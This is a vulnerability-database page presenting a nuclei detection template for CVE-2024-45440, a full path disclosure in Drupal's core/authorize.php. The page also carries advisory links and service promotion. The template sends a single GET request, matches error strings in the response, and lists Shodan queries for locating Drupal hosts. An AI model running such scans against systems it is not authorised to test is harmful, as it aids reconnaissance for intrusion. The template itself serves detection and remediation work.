Lucene search
K

Drupal 11.x-dev - Full Path Disclosure

๐Ÿ—“๏ธย 04 Jul 2026ย 03:00:48Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 40ย Views

Drupal 11.x-dev Full Path Disclosure in authorize.ph

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Generation of Error Message Containing Sensitive Information in Drupal
10 Feb 202616:18
โ€“githubexploit
BDU FSTEC
The vulnerability of the /core/authorize.php file in the Drupal CMS system allows a hacker to disclose protected information.
3 Oct 202400:00
โ€“bdu_fstec
Circl
CVE-2024-45440
29 Aug 202413:42
โ€“circl
CNNVD
Drupal ๅฎ‰ๅ…จๆผๆดž
29 Aug 202400:00
โ€“cnnvd
CVE
CVE-2024-45440
29 Aug 202400:00
โ€“cve
Cvelist
CVE-2024-45440
29 Aug 202400:00
โ€“cvelist
Exploit DB
Drupal 11.x-dev - Full Path Disclosure
19 Apr 202500:00
โ€“exploitdb
Github Security Blog
Drupal Full Path Disclosure
29 Aug 202412:31
โ€“github
NVD
CVE-2024-45440
29 Aug 202411:15
โ€“nvd
OpenVAS
Drupal Information Disclosure Vulnerability (GHSA-mg8j-w93w-xjgc) - Linux - Version Check
3 Feb 202500:00
โ€“openvas
Rows per page
id: CVE-2024-45440

info:
  name: Drupal 11.x-dev - Full Path Disclosure
  author: DhiyaneshDK
  severity: medium
  description: |
    core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.
  impact: |
    Attackers can obtain full path disclosure information even when error logging is disabled.
  remediation: |
    Configure hash_salt properly and ensure it references an existing file, or update to a patched Drupal version.
  reference:
    - https://senscybersecurity.nl/CVE-2024-45440-Explained/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45440
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-45440
    cwe-id: CWE-209
    epss-score: 0.09269
    epss-percentile: 0.94752
    cpe: cpe:2.3:a:drupal:drupal:2023-05-09:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: drupal
    product: drupal
    shodan-query:
      - http.component:"drupal"
      - cpe:"cpe:2.3:a:drupal:drupal"
  tags: cve,cve2024,drupal,exposure,error,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/core/authorize.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "getHashSalt"
          - "RuntimeException"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022077d6baebdcc5c3b475fce553bbd6d4bc33a57d5fc63ef0ad4e9b598d3a4c58060220589dcde02d67a37033d65658fdb3942eaeb634c189e05eec175045a9ac09493a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.15.3
EPSS0.09269
SSVC
40